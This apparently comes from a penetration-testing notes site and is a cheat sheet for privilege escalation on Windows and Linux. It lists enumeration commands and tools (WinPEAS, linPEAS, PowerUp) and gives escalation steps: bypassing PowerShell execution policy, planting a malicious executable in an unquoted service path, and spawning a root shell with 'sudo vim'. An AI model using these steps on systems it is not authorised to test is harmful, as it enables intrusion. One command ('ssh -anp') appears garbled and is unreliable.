Privilege Escalation [PrevEsc]

Privilege Escalation

Manual Enumeration

Users

  • Windows:

    • Identify the current user:

      whoami
net user

  • Linux:

    • Identify the current user and user details:

      whoami
id

Hostname

  • Windows:

    • Obtain system and hostname information:

      systeminfo
hostname

  • Linux:

    • Obtain system and hostname information:

      uname -a
hostname
cat /etc/issue

Running Processes and Services

  • Windows:

    • List running processes and associated services:

      tasklist /svc

  • Linux:

    • List all running processes:

      ps aux

Network Information

  • Windows:

    • Obtain network information:

      ipconfig /all
route print
netstat -ano

  • Linux:

    • Obtain network information:

      ip a | sudo ifconfig
ssh -anp

Firewall

  • Windows:

    • Check Windows firewall settings:

      netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

  • Linux:

    • Check iptables rules:

      iptables -L

Scheduled Tasks

  • Windows:

    • List scheduled tasks:

      schtasks /query /fo LIST /v

  • Linux:

    • List scheduled tasks:

      ls -lah /etc/cron*

Applications and Patch Levels

  • Windows:

    • List installed applications and patches:

      wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn

  • Linux:

    • List installed packages:

      dpkg -l

Readable/Writable Files

  • Windows:

    • Check permissions of files and directories:

      accesschk.exe -uws "Everyone" "C:/Program Files"

  • Linux:

    • Find writable directories:

      find / -writable -type d 2>/dev/null

Unmounted Disks

  • Windows:

    • List unmounted disks:

      mountvol

  • Linux:

    • List unmounted disks:

      mount

Drivers and Kernel Modules

  • Windows:

    • List installed drivers:

      driverquery.exe

  • Linux:

    • List loaded kernel modules:

      lsmod
modinfo <MODULE_NAME>

Binaries that Auto Elevate

  • Identify binaries that auto elevate privileges.

Automated Enumeration

Tools

  • Use various tools for automated privilege escalation enumeration:

    • Windows:

      • windows-privesc-checker

      • Watson

      • Sherlock

      • PowerUp

      • Windows-Exploit-Suggester

      • JAWS

      • WinPEAS.exe and .bat

    • Linux:

      • linPEAS

      • LinEnum

Windows PrivEsc

Insecure File Permissions

  • Using PowerShell:

    • Set execution policy and use PowerUp tool:

      Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

    • Check file permissions:

      icacls.exe "<FILE_PATH>"

Unquoted Service Paths

  • Create a malicious .exe file in one of the unquoted paths.

Linux PrivEsc

Understanding Permissions in Linux

  • Learn about file and directory permissions in Linux.

sudo -l

  • Check sudo privileges:

    sudo -l

sudo vim -c ':!/bin/bash'

  • Escalate privileges using Vim:

    sudo vim -c ':!/bin/bash'
PreviousPassword AttacksNextLinux Privilege Escalation

Last updated

Was this helpful?